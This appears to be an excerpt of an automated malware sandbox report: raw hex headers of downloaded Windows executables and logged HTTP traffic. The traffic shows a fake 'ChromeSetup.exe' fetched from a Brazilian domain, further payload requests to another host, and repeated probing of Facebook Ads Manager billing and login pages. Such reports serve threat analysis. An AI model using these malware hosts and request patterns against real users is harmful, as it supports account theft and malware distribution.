86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:27 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Tue, 07 Feb 2023 19:15:27 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:28 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Tue, 07 Feb 2023 19:15:28 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:34 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Tue, 07 Feb 2023 19:15:34 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:34 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Tue, 07 Feb 2023 19:15:34 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: flytourchip.com.br
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic HTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
